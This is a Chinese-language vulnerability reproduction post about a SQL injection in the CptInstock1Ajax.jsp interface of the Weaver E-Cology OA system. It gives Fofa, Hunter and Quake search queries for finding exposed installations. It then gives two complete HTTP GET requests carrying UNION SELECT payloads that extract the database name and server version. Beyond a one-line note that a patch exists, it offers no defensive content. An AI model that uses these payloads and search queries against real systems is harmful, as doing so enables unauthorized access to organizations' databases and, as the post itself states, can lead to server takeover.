泛微E-Cology系统 CptInstock1Ajax SQL注入漏洞复现

0x01 产品描述:

‌ **泛微E-Cology是一款专为中大型组织设计的数字化办公系统,旨在创建高效协同的办公环境。**‌ 该系统集成了智能化、平台化和全程数字化的特点,通过智能语音交互、与其他异构系统的集成以及电子印章、电子签名等技术的应用,实现了组织的全面数字化转型‌

0x02 漏洞描述:

泛微 E-Cology OA协同商务系统前台CptInstock1Ajax接口存在SQL注入漏洞,攻击者可以通过漏洞获取服务器内敏感信息导致信息泄露,甚至通过漏洞写入木马病毒获取服务器权限。

0x03 搜索语句:

Fofa:app="泛微-OA(e-cology)"

Hunter:body="/wui/common/page/sysRemind.jsp"

Quake:body="/wui/common/page/sysRemind.jsp"

0x04 漏洞复现:

数据库查询:

复制代码
GET /cpt/capital/CptInstock1Ajax.jsp?id=-99+UNION+ALL+SELECT+DB_Name(),1# HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

版本查询:

复制代码
GET /cpt/capital/CptInstock1Ajax.jsp?id=-99+UNION+ALL+SELECT+@@VERSION,1# HTTP/1.1
Host:your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

0x05 修复建议:

厂商已发布补丁 请及时修复。

相关推荐
数据知道2 小时前
DNS 安全攻防:缓存投毒、DNS 隧道与检测实战
安全·网络安全·缓存·缓存投毒
humors2212 小时前
【转帖】关于防范AI编程工具Claude Code安全后门隐患的风险提示
网络·安全·ai编程
梦帮科技3 小时前
Rust+Tauri+EVM:构建下一代内存安全级数字版权(DRM)主权音频网络与跨链金融系统的技术实践与全景架构
网络·安全·架构·rust·区块链·音视频·web3.py
@insist1235 小时前
系统规划与管理师-信息安全规划概述与安全架构
安全·软考·安全架构·系统规划与管理师·软件水平考试·系统规划与管理工程师
xixixi7777715 小时前
产业全景解读:太空算力、国产芯、国产大模型、6G 空天地、AI 可信身份、后量子安全多线全面突破
人工智能·安全·ai·大模型·数据中心·通信·运营商
m0_4665252915 小时前
新品发布 | 绿盟安全智算一体机,构建“算力、调度、安全“深度融合的AI基础设施
人工智能·安全
hz5678915 小时前
内网视频会议系统建设方案:适合政企单位的安全会议选择
安全·云计算·音视频·实时音视频·信息与通信
2603_9547083116 小时前
全维度容错设计,打造微电网安全运行屏障
服务器·网络·数据库·人工智能·分布式·安全
冰茶丿17 小时前
嵌入式安全第一关:Secure Boot是怎么保护你的设备的?
嵌入式硬件·安全
长风23019 小时前
Day14: 极限异常演练 —— 验证系统韧性与错误告警生成
人工智能·安全